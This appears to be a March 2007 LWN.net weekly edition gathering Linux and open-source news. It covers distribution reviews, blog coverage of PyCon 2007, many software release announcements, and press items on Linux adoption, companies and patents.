Newsletters and articles of interest Fedora cleans its repositories, considers move to Free Software (Linux.com)Linux.com looks at the direction of Fedora. "The Red Hat-sponsored Fedora project is undergoing several changes before the release of its next version. In preparation for Fedora 7, which will fuse the Core and Extra software repositories, Fedora's developers are auditing the repositories for non-free and non-open software that doesn't meet the project's guidelines. Eventually, the project may change its package guidelines to only allow Free Software."
Making NetBSD Multiboot-Compatible (O'ReillyNet)O'ReillyNet looks at making NetBSD multiboot-compatible. "The i386 architecture is full of cruft required to maintain compatibility with old machines that go back as far as the 8086 series. Technically speaking, these features aren't necessary anymore because any recent computer based on this architecture uses a full 32-bit operating system that could work perfectly fine without the legacy code. Unfortunately, the compatibility hacks remain in place and hurt the development of new software."
The Perfect Desktop - Part 3: Ubuntu 6.10 Edgy Eft (HowtoForge)HowtoForge sets up a desktop with Ubuntu 6.10 "Edgy Eft". "With the release of Microsoft's new Windows operating system (Vista), more and more people are looking for alternatives to Windows for various reasons. This tutorial is the third in a series of articles where I will show people who are willing to switch to Linux how they can set up a Linux desktop (Ubuntu 6.10 Edgy Eft in this article) that fully replaces their Windows desktop, i.e. that has all software that people need to do the things they do on their Windows desktops. The advantages are clear: you get a secure system without DRM restrictions that runs also on older hardware, and the best thing is: all software comes free of charge."
Distribution reviews Puppy Linux 2.14: This Hound Has Teeth (PerformancePC)PerformancePC reviews Puppy Linux 2.14. "Put together from scratch by Australian Barry Kauler, Puppy Linux is an extraordinary development, being a first-class OS than can load itself into and run completely from as little as 128 MB of RAM! And this includes being able to open and save your work completely in RAM. Naturally, working this way is very fast and quiet; you won't hear much noise coming from your hard drive! Right from the sparse opening screen and the puppy bark, you are treated to a very warm, comforting little world unto itself."
Enterprise (InternetNews.com)InternetNews.com looks at RHEL 4.5. "This week Red Hat rolled out a beta release of its fifth update to RHEL 4 officially tagged Red Hat Enterprise Linux 4.5, providing users with a small taste of the virtualization that is to come in RHEL 5."
Sidux: A live CD for Debian unstable (Linux.com)Linux.com reviews Sidux. "Sidux aims to be the best Debian sid-based live CD -- and it succeeds. It offers a clean, easy hard disk install and a fast release cycle. It's a rare distribution that impresses me before I've even tried it, but sidux did just that when, a few hours after I'd downloaded and burned a two-day-old preview release, the project announced that the next release was available for download. Clearly the sidux team intends to live up to its fast release philosophy."
Bootable system rescue Linux CD gets updated (DesktopLinux.com)DesktopLinux looks at SystemRescueCD 0.3.3. "The Gentoo-based SystemRescueCD 0.3.3 live CD was released on March 1, sporting a spiffy new 2.6.19.2 kernel and the WMaker desktop environment. As its name implies, SystemRescueCd is a Linux system on a bootable CD-ROM that can be used for repairing a system and its data following a crash."
Page editor: Rebecca Sobol Development The 2007 Python ConferencePyCon 2007, the 2007 Python Language Conference, took place on February 23-25, in Addison, Texas.
PyCon is a community-oriented conference targeting developers of Python applications and the Python interpreter itself. The organizers aim to make the conference affordable and accessible to all.
PyCon gives you opportunities to:
![[PyCon]](/images/ns/PyCon.png)
PyCon 2007 may be one of the most blogged-about conferences yet.
What follows is a collection of comments from members of the Python
community describing conference highlights.
Python creator Guido van Rossum put together a PyCon 2007 Review: "I'm exhausted, but it's been a great week. The conference exceeded all my (and everybody else's) expectations, with a 40% attendance increase, excellent keynotes, and an incredible "buzz"." Guido mentioned talks on IronPython, the One Laptop Per Child project, the keynote speeches, Python 2.6 and the state of the Python 3000 project (Python 3.0): "For me personally, this conference signified the coming together of the Python 3000 project (a.k.a. Py3k or Python 3.0). While in last year's keynote about this topic I mostly presented proposals, process, and plans, this year I could reveal many finished (as well as some unfinished or controversial) features, a concrete timeline with an alpha and a final release date (June 2007 and 2008, respectively), and, most importantly, a well-defined migration strategy." Guido has published some Video and Powerpoint Slides from his Python 3000 talk. Jesse Noller says OLPC Has Excited me: "Many other people are blogging about it - but this morning opening Keynote by Ivan Krstić of the One Laptop Per Child project was easily one of the best keynotes/presentations I have ever seen. My view of the project has changed." Grig Gheorghiu discusses the OLPC talk during PyCon day 1: "OLPC wants to change the way teaching and learning is done these days; they want to go back to the time when preschool kids interacted with each other by playing, and learned naturally peer-to-peer (as opposed to institutionalized teaching, which is one-to-many)" Matt Harrison covered the Testing Tools Panel: "I've blogged about bugs and testing in open source previously, so I was quite interested in this panel. I was surprised because there was little discussion of code coverage, because I think it is quite important for dynamic languages to have good coverage. (I find that doctest and coverage.py not working together is a huge warning sign that people are ignoring coverage)." Matt also had some Pycon2007 observations and thoughts: "Ubuntu appears to be the linux distro of choice now. I think I was the only one running a non-ubuntu linux (gentoo). This was quite surprising cause I met quite a few last year running Gentoo. (But since both make pretty liberal use of python I won't complain too hard). Only saw one Vista machine (Jim Huginin), but the rest seemed pretty evenly split among mac/xp/ubuntu. Draw whatever conclusion you want from that. It appears that a lot of companies are looking to hire python people, and are having a hard time finding them." Richard Jones covers day 3 of the event: "I chaired a mixed-bag session which included some discussion on teching programming with Python and finished up with a cool web widgets library. I then had some more hallway BoF, practised my lightning talk and attended the women-in-IT talk. Anna had some really interesting things to day, as she's done a pretty good survey of the available literature on the subject. The main conclusion she came up with is "we don't know for sure" why the imbalance is there, but there's some really good theories. Top of the list is culture, both outside IT (women don't do programming) and inside IT (the geek/wizard culture)." Ned Batchelder put together a Pycon blog: "I wasn't able to pay good attention to the web frameworks panel due to a crisis elsewhere, but from the testing tools panel: Chad Whitacre: "I'm addicted to dots." If you don't know what that means, you need to write (or run) more unit tests. Titus Brown: "I don't use test-driven development, I use stupidity-driven testing: when I do something stupid, I wrote a test to make sure I don't do it again."" Spyced presents some PyCon SQLAlchemy tutorial slides. "My SQLAlchemy tutorial went pretty well for the most part. It was a fast pace but most people kept up pretty well. If I did it again I would add more of an intro to ORM in general for people who had never used one, but over half the attendees had used SO or django's or tried SA already." The Voidspace Techie Blog covers the Python Community, Rails Community, Beautiful Code and the Testing Culture: "That aside, despite appreciating both languages, Andrzej feels that he learns more from the Ruby community. I mentioned earlier that Andrzej isn't a language zealot. He is a zealot for agile development techniques. What he appreciates about both Ruby and Python is that they are languages that assist and encourage in the production of beautiful and elegant code. He cares about the beauty of his code, ugly code offends him." Brett Cannon PyCon 2007 Report: "After the keynote I do what I did last year, I ignored almost all talks and hacked. =) I decided I wanted to get my PEP 362 implementation finished before the sprints started (and I did; see the sandbox). It was interesting developing some code that is both 2.6 and 3.0 compatible. If you have a need for an object representation of a function/method signature then go ahead and grab the code." Richard Jones covered the PyCon 2007 Game Sprint: "The "Game Sprint" has been about as disorganised as I'd expected. A few of us messed around writing games along the theme of "small" (with extremely loose interpretation ;). Mostly people used the exercise to learn pygame or PyOpenGL (or even in one case Python as well!) and write a game at the same time. Everyone seemed to have fun doing so, and there's now a few more people comfortable with the toolkits, which was the ultimate goal." Titus Brown announced the new testing-in-python mailing list. "Catalyzed by the great fun we had at PyCon '07, Grig Gheorghiu and I have created the "testing-in-python" (or "TIP") mailing list. This list will hopefully serve as a forum for discussing Python testing tools, testing approaches useful in Python, Web resources for same, and whatever else people would like to talk about." Glyph Lefkowitz is Recovering from PyCon: "One cool thing that I can shout from the rooftops already is that Guido, a group of concerned hackers, and I got to have a meeting of the minds, which Guido has already blogged about, addressing many upcoming concerns we all had about Python 3. That, and several other discussions with the responsible developers about the proposed transition plans for the 3.0 release have put my mind at ease." Photographs of the event were been published by Jeremy Hylton and Grig Gheorghiu. Lastly, Andrew Kuchling wrapped up the event with his PyCon wrapup and PyCon 2007 is over summary. "At-the-door registration was surprisingly stronger than we had been expecting, and the final attendance figure was 593 registered attendees, a 44% increase from 2006. The conference ran smoothly -- there were no disasters, only the odd oversight on our part or minor glitches."
System Applications Audio Projects Rivendell v0.9.80 releasedVersion 0.9.80 of Rivendell, a radio automation system, has been released. This version adds SAS router support, RDImport improvements, a new metadata format, RDCatch error alarms, RDAirPlay log autoloading, a database update and bug fixes.
Database Software Firebird 2.0.1 Release Candidate 2 announcedVersion 2.0.1 Release Candidate 2 of the Firebird DBMS has been announced. "This sub-release introduces a number of bug fixes done since the v.2.0 release in November. It does not add any new functionality to the database engine. A minor improvement is detection of Gentoo or FreeBSD during configuration."
innotop 1.3.5 releasedVersion 1.3.5 of innotop, a MySQL queries and status monitoring application, has been announced. "Version 1.3.5 is nearly feature-complete for the upcoming stable 1.4 release. I recommend that everyone upgrade to it. There are a lot of new features, including some that were scheduled for 1.6 but got moved sooner because of user requests."
MySQL 5.1.16 beta has been releasedBeta version 5.1.16 of the MySQL DBMS is available. "Bear in mind that this is a beta release, and as any other pre-production release, caution should be taken when installing on production level systems or systems with critical data."
PostgreSQL Weekly NewsThe March 4, 2007 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL DBMS articles and resources.
Filesystem Utilities TestDisk 5.7 releasedStable version 5.7 of TestDisk is available. "TestDisk is a tool to check and undelete partitions. It works with the following partitions: FAT12, FAT16, FAT32, Linux (EXT2/EXT3/HFS/JFS/RFS/XFS), Linux Raid, Linux swap, NTFS (Windows), BeFS (BeOS), UFS (BSD), and Netware NSS."
Interoperability Samba 3.0.25 pre 1 is outVersion 3.0.25 pre 1 of Samba has been announced. "This is a preview release of the Samba 3.0.25 code base and is provided for testing only. This release is *not* intended for production servers. There has been a substantial amount of development since the 3.0.23/3.0.24 series of stable releases. We would like to ask the Samba community for help in testing these changes as we work towards the next significant production upgrade Samba 3.0 release." See the release notes for more information.
Mail Software Mailfromd 3.1.2 releasedStable version 3.1.2 of Mailfromd has been announced. "Mailfromd is a general-purpose mail filtering daemon for Sendmail and Postfix. It is able to filter both incoming and outgoing messages using criteria of arbitrary complexity, supplied by the administrator in the form of a script file. The program interfaces with Sendmail using Milter protocol. Mailfromd provides the following basic features: flexible programming language for writing filter scripts, sender address verification, greylisting and whitelisting, controlling mail sending rate."
Web Site Development ccHost 4.0 releasedVersion 4.0 of ccHost, a web-based media sharing system, is out. "This release builds upon ccHost's novel support of collaboration, sharing, and storage of multi-media using the different Creative Commons licenses and metadata. These features most notably show up and are tested in Creative Commons' project, ccMixter (www.ccmixter.org), a popular on-line social network service that supports legal music sharing and remixing."
Midgard Weekly SummaryThe March 2, 2007 edition of the Midgard Weekly Summary is out with the latest news from the Midgard web content management system.
mnoGoSearch 3.3.0 releasedVersion 3.3.0 of mnoGoSearch, a web site search engine, is out with a long list of improvements. See the change log for details.
Desktop Applications Audio Applications Amarok Newsletter Issue 7 (KDE.News)KDE.News notes the publication of issue 7 of the Amarok Newsletter. "We talk about Amarok's success in the LinuxQuestions.org yearly poll, new features in the upcoming Amarok 2, and continue to point out interesting related projects. Read on for some Amarok lovin' from Wil Wheaton. In the other news, Wil Wheaton from Star Trek reviews Amarok."
Mammut V0.59 releasedVersion 0.59 of Mammut, an audio FFT application, is out with several new features and bug fixes.
Business Applications Pythomnic 4.0 releasedVersion 4.0 of Pythomnic has been announced, it adds several new capabilities. "Pythomnic is a platform for building non-stop middleware around a set of network services. It allows changing source code and configuration on the fly without interrupting the live service. Pythomnic modules can be invisibly migrated from one server to another for redundancy or load balancing. Such middleware can take as much business logic as necessary, from being a simple adapter to an integration platform."
Data Visualization Gnuplot version 4.2 announcedVersion 4.2 of Gnuplot, a data graphing utility, is out. "Of particular note in this release is support for screen display via a new gnuplot terminal type "wxt", based on the wxWidgets, Cairo, Pango libraries. This gives superb font rendering and plot anti-aliasing. Anyone interested in the future directions of gnuplot development may want to have a look also at upcoming features showcased on the demo site for the CVS development version."
Desktop Environments GNOME 2.18.0 release candidate (2.17.92) releasedVersion 2.17.92 of the GNOME desktop environment is available for testing. "Here we go: this is the last unstable release before 2.18.0. We've all added cool features, important bug fixes, great translations, or shiny documentation during the past six months. And it'll be soon ready for public consumption."
GARNOME 2.17.92 announcedVersion 2.17.92 of GARNOME, the bleeding edge GNOME distribution, is out. "We are pleased to announce the release of GARNOME 2.17.92 Desktop and Developer Platform. This release includes all of GNOME 2.17.92 (aka 2.18.0 Release Candidate), tweaked and updated with love by the GARNOME Team."
GNOME Software AnnouncementsThe following new GNOME software has been announced this week:
KDE Commit-Digest (KDE.News)The March 4, 2007 edition of the KDE Commit-Digest has been announced. The content summary says: "KSplashX, a potential replacement for the KSplashML engine is imported into KDE SVN. Continued progress in the Solid and NetworkManager integration. More refinement, including better keyboard shortcuts, in Konsole. New keyboard layouts in KTouch. Icon and undo support in Step, the educational physics simulation package. KBounce becomes the latest game to move to a scalable interface and graphics. More work in KSquares, Konquest, KSpaceDuel and KReversi. KSudoku starts to be ported to KDE 4..."
KDE Software AnnouncementsThe following new KDE software has been announced this week:
Xorg Software AnnouncementsThe following new Xorg software has been announced this week:
Electronics GNU Radio release 3.0.3 announcedRelease 3.0.3 of GNU Radio, a software programmable radio system, has been announced. "This is a bug fix and very minor enhancement update to the stable branch. All of the relevant bug fixes that have occurred on the main development trunk have been back ported here."
Financial Applications SQL-Ledger 2.6.25 releasedVersion 2.6.25 of SQL-Ledger, a web-based accounting system, is out with the following change: "removed error and info function customization option".
TXbook accounting program launchedClaus Fischer has announced the launch of TXbook. "I would like to announce TXbook, a GPL accounting program for small businesses. It has successfully done my balance sheet and P&L for an Austrian small "Limited" (Ges.m.b.H.). With some work it should serve users in the EU region well; I don't know enough about the accounting systems of other areas to make a meaningful statement."
Games Ember 0.4.2 releasedVersion 0.4.2 of Ember has been released. "Ember is a fully functional 3d client for the WorldForge project. Its meant to be as extensible as possible, to allow for future world builders to adapt it to their worlds or games. This release updates the authoring tools, adds a dynamic sky and includes a new framework for matching and updating models against server entities." Also, the WFUT tool has been added to Ember.
Interoperability Wine Weekly NewsletterThe March 5, 2007 edition of the Wine Weekly Newsletter is online with coverage of the Wine project. Topics include: Wine 0.9.32, OpenGL Thread Context Selection Patches, MSI OLE Automation Improvements, SoC 2007: HTMLHelp and Fedora Core 4 RPMs.
Wine 0.9.32 releasedVersion 0.9.32 of Wine has been announced. Changes include: "Many Direct3D fixes and performance improvements, Several new features in the builtin cmd.exe, Improvements to HTML help support and lots of bug fixes."
Mail Clients Mozilla Thunderbird 1.5.0.10 Released (MozillaZine)Version 1.5.0.10 of Mozilla Thunderbird has been announced. "Mozilla Thunderbird 1.5.0.10, a security and stability update has been released. Users of Thunderbird 1.5.0.x will receive an automated update notification within a couple of days. They can also manually upgrade by selecting Check for Updates from the Help menu."
Music Applications hexter 0.6.0 announcedVersion 0.6.0 of hexter is out with several new features. "hexter is a software synthesizer that models the sound generation of a Yamaha DX7 synthesizer. It can easily load most DX7 patch bank files, accept patch editing commands via MIDI sys-ex messages, and recreate the sound of the DX7 with greater accuracy than any other open-source emulation (that the author is aware of...) hexter operates as a plugin for the Disposable Soft Synth Interface (DSSI)."
Jackbeat 0.6.1 announcedVersion 0.6.1 of Jackbeat, an audio sequencer/drum machine, is out. Changes include the addition of .wav file output, 64 bit support, full color VU meters, user interface improvements and bug fixes.
Miscellaneous SeaMonkey 1.1.1 Released (MozillaZine)MozillaZine notes the release of SeaMonkey 1.1.1. "Following the Gecko security update releases a few days ago, the SeaMonkey project has issued new security and stability releases today for its all-in-one internet application suite. SeaMonkey 1.1.1 is now available for download, fixing several security vulnerabilities, along with a few issues reported on SeaMonkey 1.1. Simultaneously, SeaMonkey 1.0.8, a security update based on the SeaMonkey 1.0 series, was also released."
Languages and Tools C GCC Interactive Compilation Interface developmentThe GCC Interactive Compilation Interface has been launched. "We are developing an Interactive Compilation Interface (ICI) for GCC to improve its optimization heuristic, enable iterative fine-grain program optimizations for different constraints (performance, code size, power consumption, DSE, different ISAs, etc) and unify optimization knowledge reuse among different programs and architectures using statistical and machine learning techniques."
Caml Caml Weekly NewsThe March 6, 2007 edition of the Caml Weekly News is out with new Caml language articles.
Haskell Haskell Weekly NewsThe March 5, 2007 edition of the Haskell Weekly News is online. This week sees the release of "Programming in Haskell", by Graham Hutton, along with a wide range of new libraries and applications, including gui programming, terminal interfaces, xml programming, a gameboy emulator, database bindings, and a Haskell compiler shootout.
Java Java 2007: The year in preview (IBM developerWorks)Elliotte Harold presents a preview of upcoming Java developments on IBM developerWorks. "2006 was another boom year for the Java platform. The Java language retained its title as the world's most used programming language, despite an onslaught of competition from both Microsoft (C#) and the scripting community (Ruby). And, while the release of Java 6 would have been cause enough for celebration, that paled in comparison to the announcement that Java was going to go fully open source under the GNU General Public License. Can the momentum continue in 2007? Let's consider the odds."
Statement, Branch, and Path Coverage Testing in Java (O'ReillyNet)Joe Ponczak discusses Java code coverage in an O'Reilly article. "Even with unit tests approaching 100% coverage, critical logic errors could be hiding in your code. It is impossible to test every possible condition, but with a little analysis of the potential paths and a plan to test them, you can be much more confident in the quality of your tests."
Perl Weekly Perl 6 mailing list summary (O'Reilly)The March 4, 2007 edition of the Weekly Perl 6 mailing list summary is out with coverage of the latest Perl 6 developments.
The Beauty of Perl 6 Parameter PassingPhil Crow discusses Perl 6 Parameter Passing on O'Reilly. "Perl 6 is not finished, but you can already play with it. I hope this article will encourage you to try it. Begin by installing Pugs, a Perl 6 compiler implemented in Haskell. Note that you will also need Haskell (see directions in the Pugs INSTALL file for how to get it). Of course, Pugs is not finished. It couldn't be. The Perl 6 design is still in progress. However, Pugs still has many key features that are going to turn our favorite language into something even greater."
PHP PHP 4.4.6 releasedVersion 4.4.6 of PHP is available. "The main issue that this release addresses is a crash problem that was introduced in PHP 4.4.5. The problem occurs when session variables are used while register_globals is enabled."
Python Jython beta with all features of version 2.2 releasedA beta release of Jython,a Java implementation of the Python language, has been announced. "Jython community has announced the release of Jython 2.2's first beta version. This release contains all of the major features for a 2.2 release. According to the Jython Roadmap, "Jython in its current state is quite fragile... The next Jython 2.x release will build on the cleanup in the last release, and in this release we will be able to consider performance enhancements, CPython frameworks, and other considerations that where shelved for the last release.""
pylint 0.13 / astng 0.17 announcedNew versions of pylint and astng have been announced. "The PyLint release contains a bunch of bugs fixes, some new checks and command line changes, and a new checker dedicated to Restricted Python checking. If this doesn't sound familiar to you, visit the PyPy_ project web site for more information. The astng release contains a lot of inference fixes and enhancement, so even if pylint should still works with the old version you're strongly encouraged to upgrade."
Ruby Ruby Weekly NewsThe March 4, 2007 edition of the Ruby Weekly News looks at the latest discussions on the ruby-talk mailing list and comp.lang.ruby newsgroup.
Tcl/Tk Tcl-URL!The March 1, 2007 edition of the Tcl-URL! is online with new Tcl/Tk articles and resources.
Tcl-URL!The March 5, 2007 edition of the Tcl-URL! is online with new Tcl/Tk articles and resources.
IDEs PyDev release 1.2.8 (SourceForge)Release 1.2.8 of PyDev, a Python IDE plugin for Eclipse, is available with many new features and some bug fixes. The project description says: "Features editor, code completion, refactoring, outline view, debugger, and other goodies".
Libraries GNU libmatheval 1.1.4 releasedVersion 1.1.4 (stable) of GNU libmatheval has been announced. "GNU libmatheval is a library that makes it possible to calculate mathematical expressions for given variable values and to calculate expression's derivative with respect to a given variable. The library supports arbitrary variable names in expressions, decimal constants, basic unary and binary operators and elementary mathematical functions."
GNU Scientific Library 1.9 releasedVersion 1.9 (stable) of the GNU Scientific Library has been announced. "The GNU Scientific Library (GSL) is a collection of routines for numerical computing. The routines are written from scratch by the GSL team in ANSI C, and present a modern API for C programmers, while allowing wrappers to be written for very high-level languages."
Version Control Monotone 0.33 releasedVersion 0.33 of Monotone, a distributed version control system, is available. This release has an internal data format change, lots of new features and more.
Page editor: Forrest Cook Linux in the news Recommended Reading Dell, Lenovo sell Windows-free laptops for Linux customers (LinuxWorld)LinuxWorld looks at where to get laptops without Windows. "Two leading hardware vendors, Dell and Lenovo, are quietly selling laptops without preloaded Microsoft Windows to Linux customers who know where to look, says Lincoln Durey, CEO of EmperorLinux, an Atlanta reseller that customizes, installs and supports Linux on the major-brand laptops it sells."
Free Software Foundation courts hardware vendors (Linux-Watch)Linux-Watch reports on an effort by the FSF to work with hardware vendors. "The Free Software Foundation (FSF) is expanding beyond its software boundaries, and reaching out to hardware vendors to encourage them to "work with the free software community" to establish a "mutually beneficial relationship." It's all spelled out in a just-published whitepaper. On March 1, the FSF released "The road to hardware free from restrictions," written by Justin Baugh and Ward Vandewege, senior systems administrators for the FSF. In it, they detail ways for major hardware manufacturers to work with free software for the benefit of both."
OLPC project distributes second round of beta units (ars technica)ars technica reports on the second release of OLPC laptops. "The One Laptop Per Child (OLPC) project is shipping out another set of prototype XO laptops. Designated BTest-2, this series of beta test units is primarily intended to help testers evaluate improvements to the screen and touchpad. The BTest-2 units, which are in transit to select developers, will also be used to perform early tests on the wireless mesh technology. According to the release notes, the final release version of OLPC's XO laptop will be faster and more durable than the BTest-2 units and will include several additional features. The release notes also reveal that the BTest-2 units resolve several problems documented during tests conducted on the previous BTest-1 series."
Trade Shows and Conferences Sun Announces Ruby Support for NetBeans (eWeek)eWeek looks at Ruby support in NetBeans. "While the Eclipse open-source development community opens its EclipseCon conference, Sun Microsystems and the NetBeans community have announced an early-access release of the NetBeans Ruby Pack, which is a plug-in that provides support for the Ruby programming language. The NetBeans plug-in offers developers added support for dynamic and scripting languages and includes editing features for both Ruby and JRuby--an implementation of the Ruby programming language that runs on the Java Virtual Machine."
2007 HIMSS Wrap-Up (LinuxMedNews)LinuxMedNews covers the recent Healthcare Information and Management Systems Society conference. "This years HIMSS conference in New Orleans is over. Here's the conference wrap-up: CCHIT certification is being emphasized. Interoperability progress is occurring but is still confusing. Open source has a presence at HIMSS now! Read more for details."
Companies A Modest Proposal for Michael Dell (Linux Journal)Glyn Moody investigates the state of pre-installed Linux on Dell computers. "Dell is only talking about certifying its corporate client products. Worse, it's only talking about doing that with Novell hardly open source's favourite company at the moment. The justification for not going further is rather unconvincing: We don't want to pick one distribution and alienate users with a preference for another. So, rather than upset supporters of some distros, Dell has decided to be scrupulously fair and to upset supporters of all distros. It's clear from this statement that Dell is not going to offer systems with pre-installed GNU/Linux any time soon."
Novell's revenue sags, Linux business soars (Linux-Watch)Linux-Watch analyzes Novell's 2007 first quarter financial results. "Despite the unexceptional overall results during the first fiscal quarter 2007, however, Novell reported $15 million of revenue from Linux Platform Products, up 46 percent year-over-year, and $91 million of invoicing, up a whopping 659 percent year-over-year. Linux -- make no doubt about it -- is Novell's future. "
Red Hat expands developer tools business (ZDNet)ZDNet covers a partnership between Red Hat and Exadel. "The open-source software company said that it has established a partnership with Exadel in which Exadel will open source its Web development tools at JBoss.org, a Red Hat open-source project site."
Linux Adoption California may adopt OpenDocument (ZDNet)ZDNet reports that California is considering making the OpenDocument Format the required standard for state agencies. "Similar to the ODF bills proposed in Texas and Minnesota, California Assembly bill AB 1668 would require that state agencies "become equipped to accept all documents in an open, XML-based file format for office applications, and shall not adopt a file format used by only one entity.""
UK trumps Europe on Linux streaming (ZDNet UK)ZDNet UK reports on a Linux-friendly video service that is being deployed by the Waverley Borough Council. "When the European Commission launched a streaming video service last year which excluded Linux users, large swathes of the open source community became deeply angry. Now, a Surrey local council has shown that open source operating systems can be included in such programmes."
Linux at Work Fault-tolerant Linux can compete with Windows (electronicsweekly.com)electronicsweekly.com examines the use of Linux for fault-tolerant computing. "Choosing the operating system that an organisation uses to run its critical applications also remains a tough decision. Linux is growing in popularity compared with other operating systems and using Linux offers a route for organisations to achieve high availability at a potentially lower cost. As a free operating system, the level of cost would be much lower than other approaches and this is contributing to its growing popularity from a business continuity perspective. An example of this is that Linux has entered the top three operating systems chart by the volume of servers sold for the first time, according to recent research by IDC."
TRUMPF Laser to Embed MySQL in its Manufacturing ProductsMySQL AB reports on the deployment of Linux and the MySQL DBMS by TRUMPF Laser. "TRUMPF has selected MySQL to control the pulsating solid-state laser in its TruPulse series of welding tools. TRUMPF TruPulse lasers are used for welding in the automotive industry, in jewelry-making and in medical technology such as the production of dental braces -- all areas in which the highest level of precision is required. With MySQL as the central data storage in our new laser control, we attain a clean, stable and easily expandable architecture, said Rainer Thieringer, head of software development at TRUMPF Laser. Moreover, the open source concept fits perfectly with TRUMPFs control philosophy: Every piece of software in the laser control must be validated at the source code level."
Legal Patent Fights Are a Legacy of MP3's Tangled Origins (NYTimes)The New York Times has an article on MP3 patents. "Microsoft says it was doing the right thing: paying a German rights holder $16 million to license the MP3 audio format, the foundation of the digital music boom. Then an American jury ruled that Microsoft had failed to pay another MP3 patent holder, and slapped it with a $1.52 billion judgment. But the MP3 toll gates do not end there." (Thanks to petelink)
Interviews Mauricio Piacentini (People Behind KDE)The People Behind KDE has an interview with Mauricio Piacentini. "I am working on the KDE 4 versions of KMahjongg and KMines, and trying to help with the SVG conversion and art for other applications in the kdegames module. During the last few months I had a chance to work a bit (in code and art) with Ian Wadham in KGoldRunner, and Dmitry Suzdalev in KReversi." (Found on KDE.News)
Resources Failure Trends in a Large Disk Drive PopulationGoogle Labs has released a paper [PDF] that details the failure modes from a large population of hard disk drives. "Our analysis identifies several parameters from the drive's self monitoring facility (SMART) that correlate highly with failures. Despite this high correlation, we conclude that models based on SMART parameters alone are unlikely to be useful for predicting individual drive failures. Surprisingly, we found that temperature and activity levels were much less correlated with drive failures than previously reported." (Thanks to Hale Landis).
Switching your Linux systems to the new DST (Linux-Watch)Linux-Watch looks at the change in US Daylight Savings time. ""Spring forward; Fall back," That's the way the saying goes. Some years I get it backwards, but I eventually catch on. I've never had to worry about my PCs getting it wrong before, though. Now, with the recent changes in the Daylight Savings Time (DST) rules, I do. Fortunately, there are ways to make sure that both my Linux computers and I get the new rules right."
The GNOME Journal, March EditionThe latest issue of the GNOME Journal has been published. It features an introduction to GTK+ cross-platform application development, an interview with Jakub Steiner and Andreas Nilsson about the Tango Project, the first article of a series about free desktop companies, and a letter from the editor. Writers in this edition are John D. Ramsdell, Alexandre Prokoudine, Sri Ramkrishna, and Jim Hodapp, respectively.
A Host For Native Linux VST Plugins ? (Linux Journal)Dave Phillips looks at VST plugins. "Fully functional support for the VST plugin standard is one of the most important remaining problems for the Linux audio world. VST plugins are ubiquitous in the Win/Mac audio worlds, they are employed extensively in professional and desktop music software, and it may be no exaggeration to claim that the VST standard has revolutionized computer-based creation of music and sound. Given its great popularity this writer believes that stable VST support would give Windows users a compelling reason to try Linux as an alternate or replacement platform, especially if they have a sizeable investment of money and experience in their collection of VST plugins."
Linux Gazette #136Issue #136 of the Linux Gazette has been published. Topics include: Mailbag, Talkback, 2-Cent Tips, NewsBytes, Keymap and IOCTLs, A Report on SCaLE5x, A Beginner's Guide to Dual Booting Linux Mint and Windows XP, Measuring TCP Congestion Windows, The Open Source Hook, Interview: Orv Beach, Publicity Chair/SCaLE (Southern California Linux Expo), HelpDex, The Geekword Puzzle, The Linux Launderette and The LG Backpage.
How to Optimize Rank Data in MySQL (O'ReillyNet)Baron Schwartz discusses the use and optimization of DBMS software in the context of online gaming. "Imagine a site that keeps track of gamers' scores in computer games and displays gamers in "leaderboards" ordered by decreasing score. The site is written in PHP and the backend is a MySQL 5 database server. Because the data changes frequently, the server uses the InnoDB storage engine."
Single Packet Authorization (Linux Journal)Linux Journal looks at how Single Packet Authorization fills the gaps in port knocking. "Vulnerabilities have been discovered in all sorts of security software from firewalls to implementations of the Secure Shell (SSH) Protocol. For example, OpenSSH is developed by some of the most security-conscious developers in the world, and yet it occasionally contains a remotely exploitable vulnerability. This is an important fact to note because it seems to indicate that security is hard to achieve and, therefore, bolsters the case for a defense-in-depth approach. This article explores the concept of Single Packet Authorization (SPA) as a next-generation passive authentication technology beyond port knocking."
Reviews Conary: An innovative second-generation package manager (Linux.com)Linux.com takes a look at Conary. "rPath's Conary is a second-generation package manager. Considering that Erik Troan, rPath's CTO and co-founder, was one of the original authors of the RPM package format, some might be tempted to view Conary as an effort to do things right the second time around -- nor is that view far from wrong. In its design, Conary is a streamlined version of dpkg or RPM with Yum in which all the utilities of those package managers are combined in a single command and combined with version control to meet the demands of a modern distribution."
Review: Inkscape 0.45 is the best yet (Linux.com)Linux.com reviews Inkscape 0.45. "The number one most exciting new feature in Inkscape 0.45 is the addition of the first SVG Filter to the feature set, Gaussian blur. In accordance with the SVG specification, you can now adjust a blur setting for every object in a drawing, just the way you would adjust its fill color, stroke width, or opacity."
The Road to KDE 4: Dolphin and Konqueror (KDE.News)KDE.News presents a comparison between the Konqueror and Dolphin file managers. "Dolphin is a new File Manager for KDE 4 which is dedicated 100% to file management, and is not intended to be a one-size-fits-all tool as Konqueror currently attempts. It is intended to optimize your file management related tasks, and present an easy to use file manager for casual KDE use. That doesn't mean it won't be powerful or configurable, only that Dolphin is being built for a single purpose."
A laptop to change the world (ZDNet)ZDNet has run a look at the One Laptop Per Child project by Jeremy Allison. "But the real genius in the OLPC laptop is in the software. The OLPC is a completely open hardware system. There are no closed proprietary pieces to make support difficult. The software is the same, and it drives much of the needed sophistication in making the limited hardware perform acceptably. This is a system designed for people to learn from."
sshguard: Protection for OpenSSH (Linux.com)Linux.com reviews sshguard. "Are you concerned about brute force dictionary attacks on SSH? Given the popularity of these attacks, you should be. sshguard is a new tool to help protect against such attacks. Although it is still in beta stage, it appears to work well."
Upcoming PHP release will offer Unicode support (Linux.com)Linux.com takes a look at PHP 6.0. "Andrei Zmievski is one of the leading developers of the PHP programming language. Since March 2005, he has been working with about 20 other developers to add Unicode support to version 6.0 of PHP. Now their efforts are nearing an alpha release."
Miscellaneous Money or nothing? Trade-offs in FOSS compensation (Linux.com)Linux.com tackles the issues of paying some people to develop free software. "What happens when a free and open source software (FOSS) project attempts to introduce compensation for its developers? Because FOSS remains based largely on volunteer work, many worry that payment might demotivate both those who receive it and those who do not. However, community leaders who have observed how payment interacts with the FOSS ethos suggest a more complicated picture. Identifying four main types of payment -- bounties, payment in kind, grants, and employment -- these experts suggest that what happens depends on the type of payment, as well as on the individuals involved."
